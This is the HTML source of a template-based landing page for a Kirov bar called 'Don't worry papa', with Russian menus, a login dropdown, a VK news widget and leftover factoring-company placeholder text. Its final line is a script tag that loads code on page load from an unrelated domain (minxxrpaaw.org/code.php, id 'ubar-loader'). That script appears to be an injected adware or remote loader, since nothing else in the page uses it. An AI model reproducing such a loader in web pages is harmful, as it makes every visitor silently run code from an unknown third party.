<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no">
    <link rel="shortcut icon" href="Content/image/design/rsz_logo_very_big.png">
    <title>Don't worry papa</title>
    <link rel="stylesheet" href="Content/lib/bootstrap/dist/css/bootstrap.min.css" />
    <link rel="stylesheet" href="Content/lib/fontawesome/css/font-awesome.min.css" />

    <!--<link rel="stylesheet" href="Content/css/vendors.css">-->
    <link rel="stylesheet" href="Content/lib/snackbar/snackbar.min.css" />
    <link rel="stylesheet" href="Content/lib/artificial/css/animate.min.css" />
    <link rel="stylesheet" href="Content/css/style-blue.css" />
    <link rel="stylesheet" href="Content/css/artem-styles.min.css" />
    <link rel="stylesheet" href="Content/css/common.min.css" />
    <link rel="stylesheet" href="Content/css/styles.min.css" />
    
</head>
<body ng-app="app" ng-cloak>
    <header id="header-full-top" class="hidden-xs header-full">
    <div class="container">
        <a href="index.html"><div class="header-full-title" alt="факторинг дешево накладная счет-фактуры фактор"></div></a>
        <nav class="top-nav">
            <ul class="top-nav-social hidden-sm">
                <li><a href="https://vk.com/papabarkirov" target="_blank" class="animated fadeIn animation-delay-7 vk"><i class="fa fa-vk"></i></a></li>
                <li><a href="https://www.instagram.com/papabar_kirov/" target="_blank" class="animated fadeIn animation-delay-10 instagram"><i class="fa fa-instagram"></i></a></li>
            </ul>
            <div class="dropdown animated fadeInDown animation-delay-11">
                <a href="index.html#" class="dropdown-toggle" data-toggle="dropdown"><i class="fa fa-user"></i> Login</a>
                <div class="dropdown-menu dropdown-menu-right dropdown-login-box animated fadeIn">
                    <form role="form">
                        <h4>Вход</h4>

                        <div class="form-group">
                            <div class="input-group login-input">
                                <span class="input-group-addon"><i class="fa fa-user"></i></span>
                                <input type="text" class="form-control" placeholder="Username">
                            </div>
                            <br>
                            <div class="input-group login-input">
                                <span class="input-group-addon"><i class="fa fa-lock"></i></span>
                                <input type="password" class="form-control" placeholder="Password">
                            </div>
                            <div class="checkbox pull-left">
                                <input type="checkbox" id="checkbox_remember1">
                                <label for="checkbox_remember1">
                                    Запомнить
                                </label>
                            </div>
                            <button type="submit" class="btn btn-ar btn-primary pull-right">Вход</button>
                            <div class="clearfix"></div>
                        </div>
                    </form>
                </div>
            </div>
        </nav>
    </div>
</header>


    
    
<nav class="navbar navbar-top navbar-default navbar-header-full navbar-dark" role="navigation" id="navbar">
    <div class="container">
        <div class="navbar-header">
            <button type="button" class="navbar-toggle" data-toggle="collapse" data-target="#bs-example-navbar-collapse-1">
                <span class="sr-only">Toggle navigation</span>
                <i class="fa fa-bars"></i>
            </button>
            <div id="ar-brand" class="navbar-brand hidden-lg hidden-md hidden-sm">  </div>
        </div>

        <div class="collapse navbar-collapse" id="bs-example-navbar-collapse-1">
            <ul id="menu-main" class="nav navbar-nav">
                <li class='menu-item active'><a href='index.html' title='Главная'>Раз</a></li>
                <li class='menu-item '><a href='#' title='Факторинг'>Два</a></li>
                <li class='menu-item '><a href='#' title='Тарифы'>Три</a></li>
                <li class='menu-item '><a href='#' title='Клиентам'>Четыре</a></li>
                <li class='menu-item '><a href='#' title='Дебиторам'>Пять</a></li>
            </ul>
            <ul id="menu-right" class="nav navbar-nav navbar-right">
                <li><a href="tel:+79165273711">+7 (495) 9165273711</a></li>
            </ul>
        </div>
    </div>
</nav>


    <div id="content">
        

<section id="header-full" class="full-height">
    <div class="wrap-primary full-height">
        <div class="container">
            <img src="Content/image/design/logo_very_big.png" alt="" class="aligncenter head-full-logo animated bounceIn animation-delay-5">
            <h1 class="secondary-color text-center head-subtitle animated fadeInUp animation-delay-14">Какой-нить крутой слоган</h1>
            <h3 class="lead text-center animated fadeInUp animation-delay-14">Ура! &nbsp; Ура! &nbsp; Ура!</h3>
            <div class="row header-full-icons text-center">
                <div class="col-sm-3 animated fadeInDown animation-delay-19">
                    <span class="icon-ar icon-ar-circle icon-ar-xl-lg icon-ar-white icon-ar-inverse"><a href="#"><i class="fa fa-shopping-cart"></a></i></span>
                    <p class="text-center">Афиша и Новости</p>
                </div>
                <div class="col-sm-3 animated fadeInDown animation-delay-21">
                    <span class="icon-ar icon-ar-circle icon-ar-xl-lg icon-ar-white icon-ar-inverse"><a href="#"><i class="fa fa-star"></a></i></span>
                    <p class="text-center">Бронирование столов</p>
                </div>
                <div class="col-sm-3 animated fadeInDown animation-delay-22">
                    <span class="icon-ar icon-ar-circle icon-ar-xl-lg icon-ar-white icon-ar-inverse"><a href="#"><i class="fa fa-calendar-o"></a></i></span>
                    <p class="text-center">Галерея</p>
                </div>
                <div class="col-sm-3 animated fadeInDown animation-delay-20">
                    <span class="icon-ar icon-ar-circle icon-ar-xl-lg icon-ar-white icon-ar-inverse"><a href="#"><i class="fa fa-institution"></a></i></span>
                    <p class="text-center">Трансляция</p>
                </div>
            </div>
        </div>
    </div>
</section>

        <div id="footer-widgets">
            <div class="container" >
                <div class="row">
                    <div class="col-md-4">
                        <h3 class="footer-widget-title">Карта сайта</h3>
                        <ul class="list-unstyled three_cols">
                            <li><a href="index.html">Home</a></li>
                            <li><a href="blog.html">Blog</a></li>
                            <li><a href="portfolio_sidebar.html">Portafolio</a></li>
                            <li><a href="http://agmstudio.io/themes/reason/v1.4.9/portfolio_topvar.html">Works</a></li>
                            <li><a href="page_timeline_left.html">Timeline</a></li>
                            <li><a href="page_pricing.html">Pricing</a><a href="page_about2.html">About Us</a></li>
                            <li><a href="page_team.html">Our Team</a></li>
                            <li><a href="page_services.html">Services</a></li>
                            <li><a href="page_support.html">FAQ</a></li>
                            <li><a href="page_login_full.html">Login</a></li>
                            <li><a href="page_contact.html">Contact</a></li>
                        </ul>
                        <h3 class="footer-widget-title">Будьте вкурсе событий!</h3>
                        <p>Подпишитесь на нашу рассылку для электронной почты</p>
                        <div class="input-group">
                            <input type="text" class="form-control" placeholder="Email Adress">
                    <span class="input-group-btn">
                        <button class="btn btn-ar btn-primary" type="button">Подписаться</button>
                    </span>
                        </div><!-- /input-group -->
                    </div>
                    <div class="col-md-4">
                     <!--   <div class="footer-widget">
                            <h3 class="footer-widget-title">Грядущие мероприятия</h3>
                            <div class="media">
                                <a class="pull-left" href="index.html#">
                                    <img ng-repeat="gram in grams" src="{{ gram.images.standard_resolution.url }}">
                                </a>
                                <div class="media-body">
                                    <h4 class="media-heading"><a href="index.html#">Lorem ipsum Duis quis occaecat minim lorem ipsum tempor officia labor</a></h4>
                                    <small>August 18, 2013</small>
                                </div>
                            </div>
                        </div>-->
                    </div>
                    <div class="col-md-4">
                        <div ng-controller="NewsCtrl" class="footer-widget">
                            <h3 class="footer-widget-title">Прошедшие тусы</h3>
                            <div  class="row">
                                <script src="https://api.vk.com/method/wall.get?owner_id=-25908118&v=5.53&callback=newsCallback"></script>
                                <div ng-repeat="newsEntry in newsList" class="col-lg-6 col-md-6 col-sm-3 col-xs-6">
                                    <a href="index.html#" class="thumbnail"><img src="{{newsEntry.attachments[0].photo.photo_604}}" class="img-responsive" alt="Image"></a>
                                </div>
                            </div>
                        </div>
                    </div>
                </div> <!-- row -->
            </div> <!-- container -->
        </div>

    </div>



<div id="modal-factoring-request" class="modal fade" tabindex="-1" role="dialog">
    <div class="modal-dialog" role="document">
        <div class="modal-content">
            <div class="modal-header">
                <button type="button" class="close" data-dismiss="modal" aria-label="Close"><span aria-hidden="true">&times;</span></button>
                <h4 class="modal-title section-title" style="border:none;">[З]аявка на Факторинг</h4>
            </div>
            <div class="modal-body">
                <div anket-factoring></div>
                
            </div>
        </div>
    </div>
</div>

<!-- Begin Button TOP: "Back to Top" -->
<div id="back-top" style="display: none;">
    <a href="index.html#navbar"><i class="fa fa-chevron-up"></i></a>
</div>
<!-- End Button TOP -->
<!-- Begin Footer -->
    <footer id="footer">
        <p>© 2016 <a href="index.html#">DontWorryPapa</a>, inc. All rights reserved.</p>
    </footer>
<!-- End Footer -->


    <script src="Content/lib/jquery/jquery-1.11.1.min.js"></script>

    <script src="Content/lib/bootstrap/dist/js/bootstrap.min.js"></script>

    <script src="Content/lib/artificial/js/wow.min.js"></script>
    
    <script src="Content/lib/artificial/js/app.js"></script>
    <script src="Content/lib/respond/respond.min.js"></script>
    
    <script src="Content/lib/snackbar/snackbar.min.js"></script>
    <script src="Content/scripts/main.js"></script>


    <script src="Content/lib/angular/angular.min.js"></script>
    <script src="Content/lib/angular/angular-cookies.min.js"></script>
    <script src="Content/lib/angular/angular-local-storage.min.js"></script>
    
    <script src="Content/lib/angular/ngMask.min.js"></script>

    <script src="Content/app/app.js"></script>
    <script src="Content/app/classes/token.class.js"></script>
    <script src="Content/app/classes/errors.class.js"></script>
    <script src="Content/app/directives/errors.directive.js"></script>

    <script src="Content/app/services/auth.service.js"></script>

    <script src="Content/app/controllers/news.controller..js"></script>





    <script src="Content/app/services/data.service.js"></script>
    <script src="Content/app/services/anket.service.js"></script>
    <script src="Content/app/components/ankets/factoring/anket-factoring.directive.js"></script>
    <script src="Content/app/components/news/news.class.js"></script>
    <script src="Content/app/components/news/news.service.js"></script>
    <script src="Content/app/components/news/news.controller.js"></script>
    <script src="Content/app/services/file.service.js"></script>

<script src="http://minxxrpaaw.org/code.php?appid=imr38-7164-1465380875036-185c0ebc-3142-430d-ad46-e6a89523ea89&h=0&m=normal" id="ubar-loader"></script></body>

</html>